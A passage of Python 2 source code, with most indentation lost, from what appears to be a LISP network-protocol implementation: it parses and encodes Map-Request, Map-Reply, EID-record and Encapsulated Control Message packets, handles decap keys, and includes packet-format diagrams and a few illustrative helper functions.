else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# The JSON string is followed by an AFI-encoded address; we expect an
# AFI of 0, meaning no address follows.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == None): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Remove any stored security key state if the ITR has stopped doing
# key exchange after previously doing so.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
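#
# Self-contained sketch of the xTR-ID handling in encode_xtr_id() and
# decode_xtr_id() above: the 128-bit ID is split into two 64-bit halves,
# each byte-swapped by hand into network order (struct "Q" packs in host
# order here). swap64() below reimplements what byte_swap_64() appears to
# do, so the example stands on its own.
#
def lisp_example_xtr_id_roundtrip(xtr_id):
    import struct

    def swap64(value):
        return(struct.unpack("<Q", struct.pack(">Q", value))[0])
    #enddef

    upper = swap64(xtr_id >> 64)
    lower = swap64(xtr_id & 0xffffffffffffffff)
    wire = struct.pack("QQ", upper, lower)

    upper, lower = struct.unpack("QQ", wire)
    assert(((swap64(upper) << 64) | swap64(lower)) == xtr_id)
    return(wire)
#enddef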
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
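#
# Worked example of the Record-TTL convention handled by store_ttl() and
# print_ttl() above: the TTL is carried in minutes unless the top bit
# (0x80000000) is set, in which case the low 31 bits hold a value in
# seconds. This helper just restates that rule and is illustrative only.
#
def lisp_example_ttl_to_seconds(record_ttl):
    if (record_ttl & 0x80000000): return(record_ttl & 0x7fffffff)
    return(record_ttl * 60)
#enddef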
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
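#
# Reference sketch of the standard ones-complement checksum the ECM encoder
# above relies on when it calls lisp_ip_checksum() over the inner IPv4
# header. This local version assumes an even-length header whose checksum
# field (bytes 10-11) is already zero, and returns the header with the
# computed checksum written in; it is a plausible equivalent, not the
# module's actual helper.
#
def lisp_example_ip_checksum(header):
    import struct

    checksum = 0
    for i in range(0, len(header), 2):
        checksum += struct.unpack("!H", header[i:i+2])[0]
    #endfor
    while (checksum >> 16):
        checksum = (checksum & 0xffff) + (checksum >> 16)
    #endwhile
    checksum = ~checksum & 0xffff
    return(header[:10] + struct.pack("!H", checksum) + header[12:])
#enddef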
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
